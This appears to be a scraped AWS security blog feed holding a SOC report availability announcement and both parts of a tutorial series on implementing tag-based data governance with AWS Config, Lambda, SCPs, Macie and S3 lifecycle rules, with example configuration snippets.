❌

Normal view

Fall 2025 SOC 1, 2, and 3 reports are now available with 185 services in scope

20 January 2026 at 20:48

Amazon Web Services (AWS)Β is pleased to announce that the Fall 2025 System and Organization Controls (SOC) 1, 2, and 3 reports are now available. The reports cover 185 services over the 12-month period from October 1, 2024–September 30, 2025, giving customers a full year of assurance. These reports demonstrate our continuous commitment to adhering to the heightened expectations of cloud service providers.

Customers can download the Fall 2025 SOC 1 and 2 reports through AWS Artifact, a self-service portal for on-demand access to AWS compliance reports. Sign in toΒ AWS Artifact in the AWS Management Console, or learn more atΒ Getting Started with AWS Artifact. The SOC 3 report can be found on the AWS SOC Compliance Page.

AWS strives to continuously bring services into the scope of its compliance programs to help customers meet their architectural and regulatory needs. You can view the current list of services in scope on our Services in Scope page. As an AWS customer, you can reach out to your AWS account team if you have any questions or feedback about SOC compliance.

To learn more about AWS compliance and security programs, seeΒ AWS Compliance Programs. As always, we value feedback and questions; reach out to the AWS Compliance team through theΒ Contact Us page.

If you have feedback about this post, submit comments in theΒ CommentsΒ section below.

Tushar Jain

Tushar Jain
Tushar is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Tushar holds a Master of Business Administration from the Indian Institute of Management Shillong, India, and a Bachelor of Technology in electronics and telecommunication engineering from Marathwada University, India. He has over 13 years of experience in information security and holds CISM, CCSK, and CSXF certifications.

Michael Murphy

Michael Murphy
Michael is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Michael has over 14 years of experience in information security and holds a master’s degree and a bachelor’s degree in computer engineering from Stevens Institute of Technology. He also holds CISSP, CRISC, CISA, and CISM certifications.

Nathan Samuel

Nathan Samuel
Nathan is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Nathan has a Bachelor of Commerce degree from the University of the Witwatersrand, South Africa, and has over 21 years of experience in security assurance. He holds the CISA, CRISC, CGEIT, CISM, CDPSE, and Certified Internal Auditor certifications.

Gabby Iem

Gabby Iem
Gabby is a Program Manager at AWS. She supports multiple initiatives within AWS security assurance and has recently received her bachelor’s degree from Chapman University studying business administration.

Jeff Cheung

Jeff Cheung
Jeff is a Technical Program Manager at AWS where he leads multiple security and privacy initiatives across business lines. Jeff has Bachelor’s degrees in Information Systems and Economics from SUNY Stony Brook and has over 20 years of experience in information security and assurance. Jeff has held professional certifications such as CISA, CISM, and PCI-QSA.

Noah Miller

Noah Miller
Noah is a Compliance Program Manager at AWS and supports multiple security and privacy initiatives within AWS. Noah has 6 years of experience in information security. He has a master’s degree in Cybersecurity Risk Management and a bachelor’s degree in Informatics from Indiana University.

Will Black

Will Black
Will is a Compliance Program Manager at Amazon Web Services where he leads multiple security and compliance initiatives. Will has 10 years of experience in compliance and security assurance and holds a degree in Management Information Systems from Temple University. Additionally, he is a PCI Internal Security Assessor (ISA) for AWS and holds the CCSK and ISO 27001 Lead Implementer certifications.

Implementing data governance on AWS: Automation, tagging, and lifecycle strategy – Part 2

16 January 2026 at 21:26

In Part 1, we explored the foundational strategy, including data classification frameworks and tagging approaches. In this post, we examine the technical implementation approach and key architectural patterns for building a governance framework.

We explore governance controls across four implementation areas, building from foundational monitoring to advanced automation. Each area builds on the previous one, so you can implement incrementally and validate as you go:

  • Monitoring foundation: Begin by establishing your monitoring baseline. Set up AWS Config rules to track tag compliance across your resources, then configure Amazon CloudWatch dashboards to provide real-time visibility into your governance posture. By using this foundation, you can understand your current state before implementing enforcement controls.
  • Preventive controls: Build proactive enforcement by deploying AWS Lambda functions that validate tags at resource creation time. Implement Amazon EventBridge rules to trigger real-time enforcement actions and configure service control policies (SCPs) to establish organization-wide guardrails that prevent non-compliant resource deployment.
  • Automated remediation: Reduce manual intervention by setting up AWS Systems Manager Automation Documents that respond to compliance violations. Configure automated responses that correct common issues like missing tags or improper encryption and implement classification-based security controls that automatically apply appropriate protections based on data sensitivity.
  • Advanced features: Extend your governance framework with sophisticated capabilities. Deploy data sovereignty controls to help ensure regulatory compliance across AWS Regions, implement intelligent lifecycle management to optimize costs while maintaining compliance, and establish comprehensive monitoring and reporting systems that provide stakeholders with clear visibility into your governance effectiveness.

Prerequisites

Before beginning implementation, ensure you have AWS Command Line Interface (AWS CLI) installed and configured with appropriate credentials for your target accounts. Set AWS Identity and Access Managment (IAM) permissions so that you can create roles, Lambda functions, and AWS Config rules. Finally, basic familiarity with AWS CloudFormation or Terraform will be helpful, because we’ll use CloudFormation throughout our examples.

Tag governance controls

Implementing tag governance requires multiple layers of controls working together across AWS services. These controls range from preventive measures that validate resources at creation to detective controls that monitor existing resources. This section describes each control type, starting with preventive controls that act as first line of defense.

Preventive controls

Preventive controls help ensure resources are properly tagged at creation time. By implementing Lambda functions triggered by AWS CloudTrail events, you can validate tags before resources are created, preventing non-compliant resources from being deployed:

# AWS Lambda function for preventive tag enforcement def enforce_resource_tags(event, context): Β Β  Β 
	required_tags = ['DataClassification', 'DataOwner', 'Environment'] Β Β  Β  Β Β  Β 

	# Extract resource details from the event Β Β  Β 
	resource_tags = 
event['detail']['requestParameters'].get('Tags', {}) Β Β  Β  Β Β  Β 

	# Validate required tags are present Β Β  Β 
	missing_tags = [tag for tag in required_tags if tag not in resource_tags] Β Β  Β  Β Β  Β 

	if missing_tags:
		# Send alert to security team
		# Log non-compliance for compliance reporting Β Β  Β  Β  Β 
		raise Exception(f"Missing required tags: {missing_tags}")

	return {β€˜status’: β€˜compliant’}

For complete, production-ready implementation, see Implementing Tag Policies with AWS Organizations and EventBridge event patterns for resource monitoring.

Organization-wide policy enforcement

AWS Organizations tag policies provide a foundation for consistent tagging across your organization. These policies define standard tag formats and values, helping to ensure consistency across accounts:

{ Β Β 
    "tags": { Β Β  Β 
        "DataClassification": { Β Β  Β  Β 
            "tag_key": { Β Β  Β  Β  Β 
                "@@assign": "DataClassification" Β Β  Β  Β 
            }, Β Β  Β  Β 
            "tag_value": { Β Β  Β  Β  Β 
                "@@assign": ["L1", "L2", "L3"] Β Β  Β  Β 
            }, Β Β  Β  Β 
            "enforced_for": { Β Β  Β  Β  Β 
                "@@assign": [ Β Β  Β  Β  Β  Β 
                    "s3:bucket", Β Β  Β  Β  Β  Β 
                    "ec2:instance", Β Β  Β  Β  Β  Β 
                    "rds:db", Β Β  Β  Β  Β  Β 
                    "dynamodb:table" Β Β  Β  Β  Β 
                ] Β Β  Β  Β 
            } Β Β  Β 
        } Β Β 
    } 
}

Detailed implementation guidance: Getting started with tag policies & Best practices for using tag policies

Tag-based access control

Tag-based access control gives you detailed permissions using attribute-based access control (ABAC). By using this approach, you can define permissions based on resource attributes rather than creating individual IAM policies for each use case:

{ Β Β  Β 
    "Version": "2012-10-17", Β Β  Β 
    "Statement": [ Β Β  Β  Β  Β 
        { Β Β  Β  Β  Β  Β  Β 
            "Effect": "Allow", Β Β  Β  Β  Β  Β  Β 
            "Action": ["s3:GetObject", "s3:PutObject"], Β Β  Β  Β  Β  Β  Β 
            "Resource": "*", Β Β  Β  Β  Β  Β  Β 
            "Condition": { Β Β  Β  Β  Β  Β  Β  Β  Β 
                "StringEquals": { Β Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 
                    "aws:ResourceTag/DataClassification": "L1", Β Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 
                    "aws:ResourceTag/Environment": "Prod" Β Β  Β  Β  Β  Β  Β  Β  Β 
                } Β Β  Β  Β  Β  Β  Β 
            } Β Β  Β  Β  Β 
        } Β Β  Β 
    ] 
}

Multi-account governance strategy

While implementing tag governance within a single account is straightforward, most organizations operate in a multi-account environment. Implementing consistent governance across your organization requires additional controls:

# This SCP prevents creation of resources without required tags 
OrganizationControls: Β Β 
	SCPPolicy: Β Β  Β 
		Type: AWS::Organizations::Policy Β Β  Β 
		Properties: Β Β  Β  Β 
			Content: Β Β  Β  Β  Β 
				Version: "2012-10-17" Β Β  Β  Β  Β 
				Statement: Β Β  Β  Β  Β  Β 
					- 	Sid: EnforceTaggingOnResources Β Β  Β  Β  Β  Β  Β 
						Effect: Deny Β Β  Β  Β  Β  Β  Β 
						Action: Β Β  Β  Β  Β  Β  Β  Β 
							- "ec2:RunInstances" Β Β  Β  Β  Β  Β  Β  Β 
							- "rds:CreateDBInstance" Β Β  Β  Β  Β  Β  Β  Β 
							- "s3:CreateBucket" Β Β  Β  Β  Β  Β  Β 
						Resource: "*" Β Β  Β  Β  Β  Β  Β 
						Condition: Β Β  Β  Β  Β  Β  Β  Β 
							'Null': Β Β  Β  Β  Β  Β  Β  Β  Β 
								'aws:RequestTag/DataClassification': true Β Β  Β  Β  Β  Β  Β  Β  Β 
								'aws:RequestTag/Environment': true

For more information, see implementation guidance for SCPs.

Integration with on-premises governance frameworks

Many organizations maintain existing governance frameworks for their on-premises infrastructure. Extending these frameworks to AWS requires careful integration and applicability analysis. The following example shows how to use AWS Service Catalog to create a portfolio of AWS resources that align with your on-premises governance standards.

# AWS Service Catalog portfolio for on-premises aligned resources 
ServiceCatalogIntegration: Β Β 
	Portfolio: Β Β  Β 
		Type: AWS::ServiceCatalog::Portfolio Β Β  Β 
		Properties: Β Β  Β  Β 
			DisplayName: Enterprise-Aligned Resources Β Β  Β  Β 
			Description: Resources that comply with existing governance framework Β Β  Β  Β 
			ProviderName: Enterprise IT Β Β 

# Product that maintains on-prem naming conventions and controls Β Β 
	CompliantProduct: Β Β  Β 
		Type: AWS::ServiceCatalog::CloudFormationProduct Β Β  Β 
		Properties: Β Β  Β  Β 
			Name: Compliant-Resource-Bundle Β Β  Β  Β 
			Owner: Enterprise Architecture Β Β  Β  Β 
			Tags: Β Β  Β  Β  Β 
				- 	Key: OnPremMapping Β Β  Β  Β  Β  Β 
					Value: "EntArchFramework-v2"

Automating security controls based on classification

After data is classified, use these classifications to automate security controls and use AWS Config to track and validate that resources are properly tagged through defined rules that assess your AWS resource configurations, including a built-in required-tags rule. For non-compliant resources, you can use Systems Manager to automate the remediation process.

With proper tagging in place, you can implement automated security controls using EventBridge and Lambda. By using this combination, you can create a cost-effective and scalable infrastructure for enforcing security policies based on data classification. For example, when a resource is tagged as high impact, you can use EventBridge to trigger a Lambda function to enable required security measures.

def apply_security_controls(event, context): Β Β  Β 
	resource_type = event['detail']['resourceType'] Β Β  Β 
	tags = event['detail']['tags'] Β Β  Β  Β Β  Β 

	if tags['DataClassification'] == 'L1': Β Β  Β  Β  Β 
		# Apply Level 1 security controls Β Β  Β  Β  Β 
		enable_encryption(resource_type) Β Β  Β  Β  Β 
		apply_strict_access_controls(resource_type) Β Β  Β  Β  Β 
		enable_detailed_logging(resource_type) Β Β  Β 
	elif tags['DataClassification'] == 'L2': Β Β  Β  Β  Β 
		# Apply Level 2 security controls Β Β  Β  Β  Β 
		enable_standard_encryption(resource_type) Β Β  Β  Β  Β 
		apply_basic_access_controls(resource_type)

This example automation applies security controls consistently, reducing human error and maintaining compliance. Code-based controls ensure policies match your data classification.

Implementation resources:

Data sovereignty and residency

Data sovereignty and residency requirements help you comply with regulations like GDPR. Such controls can be implemented to restrict data storage and processing to specific AWS Regions:

# Config rule for region restrictions 
AWSConfig: Β Β 
	ConfigRule: Β Β  Β 
		Type: AWS::Config::ConfigRule Β Β  Β 
		Properties: Β Β  Β  Β 
			ConfigRuleName: s3-bucket-region-check Β Β  Β  Β 
			Description: Checks if S3 buckets are in allowed regions Β Β  Β  Β 
			Source: Β Β  Β  Β  Β 
				Owner: AWS Β Β  Β  Β  Β 
				SourceIdentifier: S3_BUCKET_REGION Β Β  Β  Β 
			InputParameters: Β Β  Β  Β  Β 
				allowedRegions: Β Β  Β  Β  Β  Β 
					- eu-west-1 Β Β  Β  Β  Β  Β 
					- eu-central-1

Note: This example uses eu-west-1 and eu-central-1 because these Regions are commonly used for GDPR compliance, providing data residency within the European Union. Adjust these Regions based on your specific regulatory requirements and business needs. For more information, see Meeting data residency requirements on AWS and Controls that enhance data residence protection.

Disaster recovery integration with governance controls

While organizations often focus on system availability and data recovery, maintaining governance controls during disaster recovery (DR) scenarios is important for compliance and security. To implement effective governance in your DR strategy, start by using AWS Config rules to check that DR resources maintain the same governance standards as your primary environment:

AWSConfig: Β Β 
	ConfigRule: Β Β  Β 
		Type: AWS::Config::ConfigRule Β Β  Β 
		Properties: Β Β  Β  Β 
			ConfigRuleName: dr-governance-check Β Β  Β  Β 
			Description: Ensures DR resources maintain governance controls Β Β  Β  Β 
			Source: Β Β  Β  Β  Β 
				Owner: AWS Β Β  Β  Β  Β 
				SourceIdentifier: REQUIRED_TAGS Β Β  Β  Β 
			Scope: Β Β  Β  Β  Β 
				ComplianceResourceTypes: Β Β  Β  Β  Β  Β 
					- "AWS::S3::Bucket" Β Β  Β  Β  Β  Β 
					- "AWS::RDS::DBInstance" Β Β  Β  Β  Β  Β 
					- "AWS::DynamoDB::Table" Β Β  Β  Β 
			InputParameters: Β Β  Β  Β  Β 
				tag1Key: "DataClassification" Β Β  Β  Β  Β 
				tag1Value: "L1,L2,L3" Β Β  Β  Β  Β 
				tag2Key: "Environment" Β Β  Β  Β  Β 
				tag2Value: "DR"

For your most critical data (classified as Level 1 in part 1 of this post), implement cross-Region replication while maintaining strict governance controls. This helps ensure that sensitive data remains protected even during failover scenarios:

Cross-Region: Β Β 
	ReplicationRule: Β Β  Β 
		Type: AWS::S3::Bucket Β Β  Β 
		Properties: Β Β  Β  Β 
			ReplicationConfiguration: Β Β  Β  Β  Β 
				Role: !GetAtt ReplicationRole.Arn Β Β  Β  Β  Β 
				Rules: Β Β  Β  Β  Β  Β 
					- 	Status: Enabled Β Β  Β  Β  Β  Β  Β 
						TagFilters: Β Β  Β  Β  Β  Β  Β  Β 
							- 	Key: "DataClassification" Β Β  Β  Β  Β  Β  Β  Β  Β 
								Value: "L1" Β Β  Β  Β  Β  Β  Β 
						Destination: Β Β  Β  Β  Β  Β  Β  Β 
							Bucket: !Sub "arn:aws:s3:::${DRBucket}" Β Β  Β  Β  Β  Β  Β  Β 
							EncryptionConfiguration: Β Β  Β  Β  Β  Β  Β  Β  Β 
								ReplicaKmsKeyID: !Ref DRKMSKey

Automated compliance monitoring

By combining AWS Config for resource compliance, CloudWatch for metrics and alerting, and Amazon Macie for sensitive data discovery, you can create a robust compliance monitoring framework that automatically detects and responds to compliance issues:

Figure 1: Compliance monitoring architecture

Figure 1: Compliance monitoring architecture

This architecture (shown in Figure 1) demonstrates how AWS services work together to provide compliance monitoring:

  • AWS Config, CloudTrail, and Macie monitor AWS resources
  • CloudWatch aggregates monitoring data
  • Alerts and dashboards provide real-time visibility

The following CloudFormation template implements these controls:

Resources: Β Β 
	EncryptionRule: Β Β  Β 
		Type: AWS::Config::ConfigRule Β Β  Β 
		Properties: Β Β  Β  Β 
			ConfigRuleName: s3-bucket-encryption-enabled Β Β  Β  Β 
			Source: Β Β  Β  Β  Β 
				Owner: AWS Β Β  Β  Β  Β 
				SourceIdentifier: 
S3_BUCKET_SERVER_SIDE_ENCRYPTION_ENABLED Β Β 

	MacieJob: Β Β  Β 
		Type: AWS::Macie::ClassificationJob Β Β  Β 
		Properties: Β Β  Β  Β 
			JobType: ONE_TIME Β Β  Β  Β 
			S3JobDefinition: Β Β  Β  Β  Β 
				BucketDefinitions: Β Β  Β  Β  Β  Β 
				- 	AccountId: !Ref AWS::AccountId Β Β  Β  Β  Β  Β  Β 
					Buckets: Β Β  Β  Β  Β  Β  Β  Β 
						- !Ref DataBucket Β Β  Β  Β 
				ScoreFilter: Β Β  Β  Β  Β 
					Minimum: 75 Β Β 

	SecurityAlarm: Β Β  Β 
		Type: AWS::CloudWatch::Alarm Β Β  Β 
		Properties: Β Β  Β  Β 
			AlarmName: UnauthorizedAccessAttempts Β Β  Β  Β 
			MetricName: UnauthorizedAPICount Β Β  Β  Β 
			Namespace: SecurityMetrics Β Β  Β  Β 
			Statistic: Sum Β Β  Β  Β 
			Period: 300 Β Β  Β  Β 
			EvaluationPeriods: 1 Β Β  Β  Β 
			Threshold: 3 Β Β  Β  Β 
			AlarmActions: Β Β  Β  Β  Β 
				- 	!Ref SecurityNotificationTopic Β Β  Β  Β 
			ComparisonOperator: GreaterThanThreshold

These controls provide real-time visibility into your security posture, automate responses to potential security events, and use Macie for sensitive data discovery and classification. For a complete monitoring setup, review List of AWS Config Managed Rules and Using Amazon CloudWatch dashboards.

Using AWS data lakes for governance

Modern data governance strategies often use data lakes to provide centralized control and visibility. AWS provides a comprehensive solution through the Modern Data Architecture Accelerator (MDAA), which you can use to help you rapidly deploy and manage data platform architectures with built-in security and governance controls. Figure 2 shows an MDAA reference architecture.

Figure 2: MDAA reference architecture

Figure 2: MDAA reference architecture

For detailed implementation guidance and source code, see Accelerate the Deployment of Secure and Compliant Modern Data Architectures for Advanced Analytics and AI.

Access patterns and data discovery

Understanding and managing access patterns is important for effective governance. Use CloudTrail and Amazon Athena to analyze access patterns:

SELECT Β Β 
	useridentity.arn, Β Β 
	eventname, Β Β 
	requestparameters.bucketname, Β Β 
	requestparameters.key, Β Β 
	COUNT(*) as access_count 
FROM cloudtrail_logs 
WHERE eventname IN ('GetObject', 'PutObject') 
GROUP BY 1, 2, 3, 4 
ORDER BY access_count DESC 
LIMIT 100;

This query helps identify frequently accessed data and unusual patterns in access behavior. These insights help you to:

  • Optimize storage tiers based on access frequency
  • Refine DR strategies for frequently accessed data
  • Identify of potential security risks through unusual access patterns
  • Fine-tune data lifecycle policies based on usage patterns

For sensitive data discovery, consider integrating Macie to automatically identify and protect PII across your data estate.

Machine learning model governance with SageMaker

As organizations advance in their data governance journey, many are deploying machine learning models in production, necessitating governance frameworks that extend to machine learning (ML) operations. Amazon SageMaker offers advanced tools that you can use to maintain governance over ML assets without impeding innovation.

SageMaker governance tools work together to provide comprehensive ML oversight:

  • Role Manager provides fine-grained access control for ML roles
  • Model Cards centralize documentation and lineage information
  • Model Dashboard offers organization-wide visibility into deployed models
  • Model Monitor automates drift detection and quality control

The following example configures SageMaker governance controls:

# Basic/High-level ML governance setup with role and monitoring SageMakerRole: Β Β 
	Type: AWS::IAM::Role Β Β 
	Properties: Β Β  Β 
		# Allow SageMaker to use this role Β Β  Β 
		AssumeRolePolicyDocument: Β Β  Β  Β 
			Statement: Β Β  Β  Β  Β 
				- 	Effect: Allow Β Β  Β  Β  Β  Β 
					Principal: Β Β  Β  Β  Β  Β  Β 
						Service: sagemaker.amazonaws.com Β Β  Β  Β  Β  Β 
					Action: sts:AssumeRole Β Β  Β 
		# Attach necessary permissions Β Β  Β 
		ManagedPolicyArns: Β Β  Β  Β 
				- 	arn:aws:iam::aws:policy/AmazonSageMakerFullAccess 

ModelMonitor: Β Β 
	Type: AWS::SageMaker::MonitoringSchedule Β Β 
	Properties: Β Β  Β 
		# Set up hourly model monitoring Β Β  Β 
		MonitoringScheduleName: hourly-model-monitor Β Β  Β 
		ScheduleConfig: Β Β  Β  Β 
			ScheduleExpression: 'cron(0 * * * ? *)' Β # Run hourly

This example demonstrates two essential governance controls: role-based access management for secure service interactions and automated hourly monitoring for ongoing model oversight. While these technical implementations are important, remember that successful ML governance requires integration with your broader data governance framework, helping to ensure consistent controls and visibility across your entire data and analytics ecosystem. For more information, see Model governance to manage permissions and track model performance.

Cost optimization through automated lifecycle management

Effective data governance isn’t just about securityβ€”it’s also about managing cost efficiently. Implement intelligent data lifecycle management based on classification and usage patterns, as shown in Figure 3:

Figure 3: Tag-based lifecycle management in Amazon S3

Figure 3: Tag-based lifecycle management in Amazon S3

Figure 3 illustrates how tags drive automated lifecycle management:

  • New data enters Amazon Simple Storage Service (Amazon S3) with the tag DataClassification: L2
  • Based on classification, the data starts in Standard/INTELLIGENT_TIERING
  • After 90 days, the data transitions to Amazon S3 Glacier storage for cost-effective archival
  • The RetentionPeriod tag (84 months) determines final expiration

Here’s the implementation of the preceding lifecycle rules:

LifecycleConfiguration: Β Β 
	Rules: Β Β  Β 
		- 	ID: IntelligentArchive Β Β  Β  Β 
        	Status: Enabled Β Β  Β  Β 
            Transitions: Β Β  Β  Β  Β 
				- 	StorageClass: INTELLIGENT_TIERING Β Β  Β  Β  Β  Β 
                	TransitionInDays: 0 Β Β  Β  Β  Β 
               	- 	StorageClass: GLACIER Β Β  Β  Β  Β  Β 
                	TransitionInDays: 90 Β Β  Β  Β 
			Prefix: /data/ Β Β  Β  Β 
			TagFilters: Β Β  Β  Β  Β 
				- 	Key: DataClassification Β Β  Β  Β  Β  Β 
                	Value: L2 Β Β  Β 
   		- 	ID: RetentionPolicy Β Β  Β  Β 
        	Status: Enabled Β Β  Β  Β 
            ExpirationInDays: 2555 Β # 7 years Β Β  Β  Β 
            TagFilters: Β Β  Β  Β  Β 
				- 	Key: RetentionPeriod Β Β  Β  Β  Β  Β 
                	Value: "84" Β # 7 years in months

S3 Lifecycle automatically optimizes storage costs while maintaining compliance with retention requirements. For example, data initially stored in Amazon S3 Intelligent-Tiering automatically moves to Glacier after 90 days, significantly reducing storage costs while helping to ensure data remains available when needed. For more information, seeManaging the lifecycle of objects and Managing storage costs with Amazon S3 Intelligent-Tiering.

Conclusion

Successfully implementing data governance on AWS requires both a structured approach and adherence to key best practices. As you progress through your implementation journey, keep these fundamental principles in mind:

  • Start with a focused scope and gradually expand. Begin with a pilot project that addresses high-impact, low-complexity use cases. By using this approach, you can demonstrate quick wins while building experience and confidence in your governance framework.
  • Make automation your foundation. Apply AWS services such as Amazon EventBridge for event-driven responses, implement automated remediation for common issues, and create self-service capabilities that balance efficiency with compliance. This automation-first approach helps ensure scalability and consistency in your governance framework.
  • Maintain continuous visibility and improvement. Regular monitoring, compliance checks, and framework updates are essential for long-term success. Use feedback from your operations team to refine policies and adjust controls as your organization’s needs evolve.

Common challenges to be aware of:

  • Initial resistance to change from teams used to manual processes
  • Complexity in handling legacy systems and data
  • Balancing security controls with operational efficiency
  • Maintaining consistent governance across multiple AWS accounts and regions

For more information, implementation support, and guidance, see:

By following this approach and remaining mindful of potential challenges, you can build a robust, scalable data governance framework that grows with your organization while maintaining security, compliance, and efficient data operations.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Tushar Jain Omar Ahmed
Omar Ahmed is an Auto and Manufacturing Solutions Architect who specializes in analytics. Omar’s journey in cloud computing began as an AWS data center operations technician, where he developed hands on infrastructure expertise. Outside of work, he enjoys motorsports, gaming, and swimming.
Will Black Omar Mahmoud
Omar is a Solutions Architect helping small-medium businesses with their cloud journey. He specializes in Amazon Connect and next-gen developer services like Kiro. Omar began at AWS as a data center operations technician, gaining hands-on cloud infrastructure experience. Outside work, Omar enjoys gaming, hiking, and soccer.
Fritz Kunstler Changil Jeong
Changil Jeong is a Solutions Architect at Amazon Web Services (AWS) partnering with Independent software vendor customers on their cloud transformation journey, with strong interests in security. He joined AWS as an SDE apprentice before transitioning to SA. Previously served in the U.S. Army as a financial and budgeting analyst and worked at a large IT consulting firm as a SaaS security analyst.
Brian Ruf Paige Broderick
Paige Broderick is a Solutions Architect at Amazon Web Services (AWS) who works with Enterprise customers to help them achieve their AWS objectives. She specializes in cloud operations, focusing on governance and using AWS to develop smart manufacturing solutions. Outside of work, Paige is an avid runner and is likely training for her next marathon.

Implementing data governance on AWS: Automation, tagging, and lifecycle strategy – Part 1

16 January 2026 at 21:26

Generative AI and machine learning workloads create massive amounts of data. Organizations need data governance to manage this growth and stay compliant. While data governance isn’t a new concept, recent studies highlight a concerning gap: a Gartner study of 300 IT executives revealed that only 60% of organizations have implemented a data governance strategy, with 40% still in planning stages or uncertain where to begin. Furthermore, a 2024 MIT CDOIQ survey of 250 chief data officers (CDOs) found that only 45% identify data governance as a top priority.

Although most businesses recognize the importance of data governance strategies, regular evaluation is important to ensure these strategies evolve with changing business needs, industry requirements, and emerging technologies. In this post, we show you a practical, automation-first approach to implementing data governance on Amazon Web Services (AWS) through a strategic and architectural guideβ€”whether you’re starting at the beginning or improving an existing framework.

In this two-part series, we explore how to build a data governance framework on AWS that’s both practical and scalable. Our approach aligns with what AWS has identified as the core benefits of data governance:

  • Classify data consistently and automate controls to improve quality
  • Give teams secure access to the data they need
  • Monitor compliance automatically and catch issues early

In this post, we cover strategy, classification framework, and tagging governanceβ€”the foundation you need to get started. If you don’t already have a governance strategy, we provide a high-level overview of AWS tools and services to help you get started. If you have a data governance strategy, the information in this post can assist you in evaluating its effectiveness and understanding how data governance is evolving with new technologies.

In Part 2, we explore the technical architecture and implementation patterns with conceptual code examples, and throughout both parts, you’ll find links to production-ready AWS resources for detailed implementation.

Prerequisites

Before implementing data governance on AWS, you need the right AWS setup and buy-in from your teams.

Technical foundation

Start with a well-structured AWS Organizations setup for centralized management. Make sure AWS CloudTrail and AWS Config are enabled across accountsβ€”you’ll need these for monitoring and auditing. Your AWS Identity and Access Management (IAM) framework should already define roles and permissions clearly.

Beyond these services, you’ll use several AWS tools for automation and enforcement. The AWS service quick reference table that follows lists everything used throughout this guide.

Organizational readiness

Successful implementation of data governance requires clear organizational alignment and preparation across multiple dimensions.

  • Define roles and responsibilities. Data owners classify data and approve access requests. Your platform team handles AWS infrastructure and builds automation, while security teams set controls and monitor compliance. Application teams then implement these standards in their daily workflows.
  • Document your compliance requirements. List the regulations you must followβ€”GDPR, PCI-DSS, SOX, HIPAA, or others. Create a data classification framework that aligns with your business risk. Document your tagging standards and naming conventions so everyone follows the same approach.
  • Plan for change management. Get executive support from leaders who understand why governance matters. Start with pilot projects to demonstrate value before rolling out organization-wide. Provide role-based training and maintain up-to-date governance playbooks. Establish feedback mechanisms so teams can report issues and suggest improvements.

Key performance indicators (KPIs) to monitor

To measure the effectiveness of your data governance implementation, track the following essential metrics and their target objectives.

  • Resource tagging compliance: Aim for 95%, measured through AWS Config rules with weekly monitoring, focusing on critical resources and sensitive data classifications.
  • Mean time to respond to compliance issues: Target less than 24 hours for critical issues. Tracked using CloudWatch metrics with automated alerting for high-priority non-compliance events
  • Reduction in manual governance tasks: Target reduction of 40% in the first year. Measured through automated workflow adoption and remediation success rates.
  • Storage cost optimization based on data classification: Target 15–20% reduction through intelligent tiering and lifecycle policies, monitored monthly by classification level.

With these technical and organizational foundations in place, you’re ready to implement a sustainable data governance framework.

AWS services used in this guide – Quick reference

This implementation uses the following AWS services. Some are prerequisites, while others are introduced throughout the guide.

Category

Services

Description

Foundation

AWS Organizations

Multi-account management structure that enables centralized policy enforcement and governance across your entire AWS environment.

AWS Identity and Access Management (IAM)

Controls who can access what resources through roles, policies, and permissionsβ€”the foundation of your security model.

Monitoring and auditing

AWS CloudTrail

Records every API call made in your AWS accounts, creating a complete audit trail of who did what, when, and from where.

AWS Config

Continuously monitors resource configurations and evaluates them against rules you define (such as requiring that all S3 buckets much be encrypted). When it finds resources that don’t meet your rules, it flags them as non-compliant so you can fix them manually or automatically.

Amazon CloudWatch

Aggregates metrics, logs, and events from across AWS for real-time monitoring, dashboards, and automated alerting on governance non-compliance.

Automation and enforcement

Amazon EventBridge

Acts as a central notification system that watches for specific events in your AWS environment (such as when an S3 bucket has been created) and automatically triggers actions in response (such as by running a Lambda function to check if it has the required tags). Think of it as an if this happens, then do that automation engine.

AWS Lambda

Runs your governance code (tag validation, security controls, remediation) in response to events without managing servers.

AWS Systems Manager

Automates operational tasks across your AWS resources. In governance, it’s primarily used to automatically fix non-compliant resourcesβ€”for example, if AWS Config detects an unencrypted database, Systems Manager can run a pre-defined script to enable encryption without manual intervention.

Data protection

Amazon Macie

Uses machine learning to automatically discover, classify, and protect sensitive data like personal identifiable information (PII) across your S3 buckets.

AWS Key Management Service (AWS KMS)

Manages encryption keys for protecting data at rest, essential for high-impact data classifications.

Analytics & Insights

Amazon Athena

Serverless query service that analyzes data in Amazon S3 using SQLβ€”perfect for querying CloudTrail logs to understand access patterns.

Standardization

AWS Service Catalog

Creates catalogs of pre-approved, governance-compliant resources that teams can deploy through self-service.

ML Governance

Amazon SageMaker

Provides specialized tools for governing machine learning operations including model monitoring, documentation, and access control.

Understanding the data governance challenge

Organizations face complex data management challenges, from maintaining consistent data classification to ensuring regulatory compliance across their environments. Your strategy should maintain security, ensure compliance, and enable business agility through automation. While this journey can be complex, breaking it down into manageable components makes it achievable.

The foundation: Data classification framework

Data classification is a foundational step in cybersecurity risk management and data governance strategies. Organizations should use data classification to determine appropriate safeguards for sensitive or critical data based on their protection requirements. Following the NIST (National Institute of Standards and Technology) framework, data can be categorized based on the potential impact to confidentiality, integrity, and availability of information systems:

  • High impact: Severe or catastrophic adverse effect on organizational operations, assets, or individuals
  • Moderate impact: Serious adverse effect on organizational operations, assets, or individuals
  • Low impact: Limited adverse effect on organizational operations, assets, or individuals

Before implementing controls, establishing a clear data classification framework is essential. This framework serves as the backbone of your security controls, access policies, and automation strategies. The following is an example of how a company subject to the Payment Card Industry Data Security Standard (PCI-DSS) might classify data:

  • Level 1 – Most sensitive data:
    • Examples: Financial transaction records, customer PCI data, intellectual property
    • Security controls: Encryption at rest and in transit, strict access controls, comprehensive audit logging
  • Level 2 – Internal use data:
    • Examples: Internal documentation, proprietary business information, development code
    • Security controls: Standard encryption, role-based access control
  • Level 3 – Public data:
    • Examples: Marketing materials, public documentation, press releases
    • Security controls: Integrity checks, version, control

To help with data classification and tagging, AWS created AWS Resource Groups, a service that you can use to organize AWS resources into groups using criteria that you define as tags. If you’re using multiple AWS accounts across your organization, AWS Organizations supports tag policies, which you can use to standardize the tags attached to the AWS resources in an organization’s account. The workflow for using tagging is shown in Figure 1. For more information, see Guidance for Tagging on AWS.

Figure 1: Workflow for tagging on AWS for a multi-account environment

Figure 1: Workflow for tagging on AWS for a multi-account environment

Your tag governance strategy

A well-designed tagging strategy is fundamental to automated governance. Tags not only help organize resources but also enable automated security controls, cost allocation, and compliance monitoring.

Figure 2: Tag governance workflow

Figure 2: Tag governance workflow

As shown in Figure 2, tag policies use the following process:

  1. AWS validates tags when you create resources.
